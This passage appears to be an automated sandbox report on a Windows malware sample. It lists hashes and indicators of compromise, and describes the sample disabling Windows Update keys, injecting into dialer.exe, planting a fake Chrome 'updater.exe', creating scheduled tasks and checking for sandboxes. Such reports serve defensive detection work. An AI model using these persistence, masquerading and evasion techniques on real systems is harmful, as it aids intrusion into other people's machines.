Analysis
-
max time kernel
1801s -
max time network
1789s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-es -
resource tags
arch:x64arch:x86image:win10v2004-20230621-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
29-06-2023 21:17
Static task
static1
Behavioral task
behavioral1
Sample
dmi1dfg7n.exe
Resource
win7-20230621-es
Behavioral task
behavioral2
Sample
dmi1dfg7n.exe
Resource
win10v2004-20230621-es
General
-
Target
dmi1dfg7n.exe
-
Size
2.8MB
-
MD5
9253ed091d81e076a3037e12af3dc871
-
SHA1
ec02829a25b3bf57ad061bbe54180d0c99c76981
-
SHA256
78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
-
SHA512
29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
SSDEEP
49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Suspicious use of NtCreateProcessExOtherParentProcess 28 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeDllHost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesc.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 1416 created 4256 1416 WerFault.exe DllHost.exe PID 1388 created 1372 1388 WerFault.exe DllHost.exe PID 2900 created 3408 2900 WerFault.exe DllHost.exe PID 1428 created 4208 1428 WerFault.exe DllHost.exe PID 3928 created 4812 3928 WerFault.exe DllHost.exe PID 560 created 2412 560 WerFault.exe backgroundTaskHost.exe PID 4648 created 3816 4648 WerFault.exe DllHost.exe PID 1348 created 4072 1348 DllHost.exe WerFault.exe PID 4332 created 2264 4332 WerFault.exe DllHost.exe PID 728 created 1232 728 WerFault.exe DllHost.exe PID 2420 created 5116 2420 WerFault.exe DllHost.exe PID 4072 created 4200 4072 WerFault.exe DllHost.exe PID 3768 created 1404 3768 WerFault.exe DllHost.exe PID 1556 created 4576 1556 WerFault.exe DllHost.exe PID 4700 created 4808 4700 WerFault.exe DllHost.exe PID 4156 created 4256 4156 WerFault.exe DllHost.exe PID 2280 created 3400 2280 WerFault.exe DllHost.exe PID 4648 created 4072 4648 sc.exe DllHost.exe PID 860 created 3128 860 WerFault.exe sc.exe PID 568 created 3828 568 WerFault.exe DllHost.exe PID 4208 created 2592 4208 WerFault.exe DllHost.exe PID 4432 created 2740 4432 WerFault.exe DllHost.exe PID 3516 created 748 3516 WerFault.exe DllHost.exe PID 2828 created 4648 2828 WerFault.exe sc.exe PID 2520 created 5084 2520 WerFault.exe DllHost.exe PID 804 created 3624 804 WerFault.exe DllHost.exe PID 1320 created 3928 1320 WerFault.exe powershell.exe PID 4252 created 3692 4252 WerFault.exe DllHost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs
Processes:
powershell.EXEpowershell.EXEsvchost.exedescription pid process target process PID 1688 created 624 1688 powershell.EXE winlogon.exe PID 2824 created 624 2824 powershell.EXE winlogon.exe PID 3264 created 3828 3264 svchost.exe DllHost.exe PID 3264 created 4256 3264 svchost.exe DllHost.exe PID 3264 created 1372 3264 svchost.exe DllHost.exe PID 3264 created 3980 3264 svchost.exe DllHost.exe PID 3264 created 4700 3264 svchost.exe DllHost.exe PID 3264 created 1232 3264 svchost.exe DllHost.exe PID 3264 created 4228 3264 svchost.exe DllHost.exe PID 3264 created 3596 3264 svchost.exe DllHost.exe PID 3264 created 4120 3264 svchost.exe DllHost.exe PID 3264 created 4856 3264 svchost.exe DllHost.exe PID 3264 created 4948 3264 svchost.exe DllHost.exe PID 3264 created 3372 3264 svchost.exe DllHost.exe PID 3264 created 4944 3264 svchost.exe DllHost.exe PID 3264 created 4716 3264 svchost.exe DllHost.exe PID 3264 created 636 3264 svchost.exe WerFault.exe PID 3264 created 3408 3264 svchost.exe DllHost.exe PID 3264 created 3028 3264 svchost.exe WerFault.exe PID 3264 created 1708 3264 svchost.exe DllHost.exe PID 3264 created 4480 3264 svchost.exe DllHost.exe PID 3264 created 5012 3264 svchost.exe DllHost.exe PID 3264 created 3652 3264 svchost.exe WerFault.exe PID 3264 created 4780 3264 svchost.exe WerFault.exe PID 3264 created 4564 3264 svchost.exe WerFault.exe PID 3264 created 2588 3264 svchost.exe DllHost.exe PID 3264 created 2276 3264 svchost.exe WerFault.exe PID 3264 created 2264 3264 svchost.exe DllHost.exe PID 3264 created 772 3264 svchost.exe DllHost.exe PID 3264 created 432 3264 svchost.exe DllHost.exe PID 3264 created 2016 3264 svchost.exe DllHost.exe PID 3264 created 5116 3264 svchost.exe DllHost.exe PID 3264 created 2632 3264 svchost.exe DllHost.exe PID 3264 created 5004 3264 svchost.exe DllHost.exe PID 3264 created 224 3264 svchost.exe DllHost.exe PID 3264 created 4792 3264 svchost.exe WerFault.exe PID 3264 created 1528 3264 svchost.exe DllHost.exe PID 3264 created 3520 3264 svchost.exe DllHost.exe PID 3264 created 1036 3264 svchost.exe DllHost.exe PID 3264 created 4580 3264 svchost.exe DllHost.exe PID 3264 created 5116 3264 svchost.exe DllHost.exe PID 3264 created 4868 3264 svchost.exe DllHost.exe PID 3264 created 848 3264 svchost.exe WerFault.exe PID 3264 created 4824 3264 svchost.exe DllHost.exe PID 3264 created 2872 3264 svchost.exe DllHost.exe PID 3264 created 2044 3264 svchost.exe DllHost.exe PID 3264 created 4208 3264 svchost.exe DllHost.exe PID 3264 created 2460 3264 svchost.exe DllHost.exe PID 3264 created 3700 3264 svchost.exe DllHost.exe PID 3264 created 3060 3264 svchost.exe DllHost.exe PID 3264 created 1784 3264 svchost.exe DllHost.exe PID 3264 created 1956 3264 svchost.exe DllHost.exe PID 3264 created 4812 3264 svchost.exe DllHost.exe PID 3264 created 2640 3264 svchost.exe DllHost.exe PID 3264 created 2968 3264 svchost.exe DllHost.exe PID 3264 created 4804 3264 svchost.exe DllHost.exe PID 3264 created 5116 3264 svchost.exe DllHost.exe PID 3264 created 5012 3264 svchost.exe DllHost.exe PID 3264 created 2412 3264 svchost.exe backgroundTaskHost.exe PID 3264 created 3816 3264 svchost.exe DllHost.exe PID 3264 created 2328 3264 svchost.exe WerFault.exe PID 3264 created 4192 3264 svchost.exe DllHost.exe PID 3264 created 4968 3264 svchost.exe DllHost.exe PID 3264 created 4948 3264 svchost.exe DllHost.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
updater.exeupdater.exepid process 852 updater.exe 4292 updater.exe -
Checks system information in the registry 2 TTPs 4 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
cmd.execmd.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName cmd.exe -
Drops file in System32 directory 27 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exepowershell.EXEpowershell.EXEpowershell.EXEpowershell.exesvchost.exesvchost.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\System32\Tasks\dialersvc32 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53 OfficeClickToRun.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53 OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\dialersvc64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
dmi1dfg7n.exepowershell.EXEpowershell.EXEupdater.exedmi1dfg7n.exepowershell.EXEpowershell.EXEdmi1dfg7n.exepowershell.EXEpowershell.EXEdescription pid process target process PID 4980 set thread context of 2892 4980 dmi1dfg7n.exe dialer.exe PID 1688 set thread context of 3720 1688 powershell.EXE dllhost.exe PID 2824 set thread context of 3084 2824 powershell.EXE dllhost.exe PID 852 set thread context of 2672 852 updater.exe dialer.exe PID 852 set thread context of 4956 852 updater.exe dialer.exe PID 2388 set thread context of 4488 2388 dmi1dfg7n.exe dialer.exe PID 1668 set thread context of 3736 1668 powershell.EXE dllhost.exe PID 3612 set thread context of 1524 3612 powershell.EXE sc.exe PID 4408 set thread context of 1676 4408 dmi1dfg7n.exe dialer.exe PID 2968 set thread context of 1428 2968 powershell.EXE dllhost.exe PID 1784 set thread context of 3960 1784 powershell.EXE dllhost.exe -
Drops file in Program Files directory 8 IoCs
Processes:
updater.execmd.exedmi1dfg7n.exeupdater.execmd.execmd.exedmi1dfg7n.exedmi1dfg7n.exedescription ioc process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File opened for modification C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe dmi1dfg7n.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe dmi1dfg7n.exe File created C:\Program Files\Google\Chrome\updater.exe dmi1dfg7n.exe -
Drops file in Windows directory 14 IoCs
Processes:
dialer.exedialer.exedialer.exesvchost.exedescription ioc process File opened for modification C:\Windows\Tasks\dialersvc64.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc32.job dialer.exe File created C:\Windows\Tasks\dialersvc64.job dialer.exe File created C:\Windows\Tasks\dialersvc32.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc32.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc64.job dialer.exe File created C:\Windows\Tasks\dialersvc32.job dialer.exe File created C:\Windows\Tasks\dialersvc64.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc64.job svchost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job dialer.exe File created C:\Windows\Tasks\dialersvc64.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc32.job svchost.exe File created C:\Windows\Tasks\dialersvc32.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc32.job dialer.exe -
Launches sc.exe 25 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3760 sc.exe 892 sc.exe 3128 sc.exe 1524 sc.exe 4528 sc.exe 3696 sc.exe 1268 sc.exe 5116 sc.exe 1556 sc.exe 2836 sc.exe 496 sc.exe 1504 sc.exe 2964 sc.exe 1688 sc.exe 3016 sc.exe 2044 sc.exe 4132 sc.exe 560 sc.exe 3872 sc.exe 2496 sc.exe 4648 sc.exe 3956 sc.exe 2624 sc.exe 2560 sc.exe 2384 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4376 3516 WerFault.exe DllHost.exe 3128 4456 WerFault.exe DllHost.exe 4856 3828 WerFault.exe DllHost.exe 2620 4256 WerFault.exe DllHost.exe 772 1372 WerFault.exe DllHost.exe 1676 3980 WerFault.exe DllHost.exe 1908 4700 WerFault.exe DllHost.exe 1564 1232 WerFault.exe DllHost.exe 4564 4228 WerFault.exe DllHost.exe 4648 3596 WerFault.exe DllHost.exe 1884 4120 WerFault.exe DllHost.exe 2100 4856 WerFault.exe DllHost.exe 4200 4948 WerFault.exe DllHost.exe 4436 3372 WerFault.exe DllHost.exe 2416 4944 WerFault.exe DllHost.exe 2832 4716 WerFault.exe DllHost.exe 4128 636 WerFault.exe 3940 3408 WerFault.exe DllHost.exe 1940 3028 WerFault.exe 3824 1708 WerFault.exe DllHost.exe 496 4480 WerFault.exe DllHost.exe 4584 5012 WerFault.exe 4284 3652 WerFault.exe 2256 4780 WerFault.exe 1668 4564 WerFault.exe 636 2588 WerFault.exe DllHost.exe 4792 2264 WerFault.exe 992 2276 WerFault.exe DllHost.exe 3520 772 WerFault.exe DllHost.exe 3928 432 WerFault.exe DllHost.exe 1484 2016 WerFault.exe DllHost.exe 4264 5116 WerFault.exe 3616 2632 WerFault.exe DllHost.exe 2348 5004 WerFault.exe DllHost.exe 1548 224 WerFault.exe DllHost.exe 4140 4792 WerFault.exe 1420 1528 WerFault.exe DllHost.exe 3596 3520 WerFault.exe DllHost.exe 3268 1036 WerFault.exe DllHost.exe 4500 4580 WerFault.exe DllHost.exe 1992 5116 WerFault.exe 4680 4868 WerFault.exe DllHost.exe 776 848 WerFault.exe 1172 4824 WerFault.exe DllHost.exe 2416 2872 WerFault.exe DllHost.exe 2968 2044 WerFault.exe 4744 4208 WerFault.exe DllHost.exe 4564 2460 WerFault.exe DllHost.exe 1056 3700 WerFault.exe DllHost.exe 1080 3060 WerFault.exe DllHost.exe 3584 1784 WerFault.exe DllHost.exe 4924 1956 WerFault.exe 4384 4812 WerFault.exe DllHost.exe 5008 2640 WerFault.exe DllHost.exe 4864 2968 WerFault.exe DllHost.exe 4948 4804 WerFault.exe DllHost.exe 5064 5116 WerFault.exe 3652 5012 WerFault.exe DllHost.exe 2944 2412 WerFault.exe DllHost.exe 656 3816 WerFault.exe DllHost.exe 1940 2328 WerFault.exe 1636 4192 WerFault.exe DllHost.exe 5092 4968 WerFault.exe DllHost.exe 4212 4948 WerFault.exe DllHost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeConhost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeConhost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeDllHost.exeDllHost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesc.exeWerFault.exedllhost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeDllHost.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Conhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 DllHost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 DllHost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz sc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 DllHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
sc.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedllhost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeDllHost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exereg.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU sc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dllhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU DllHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened 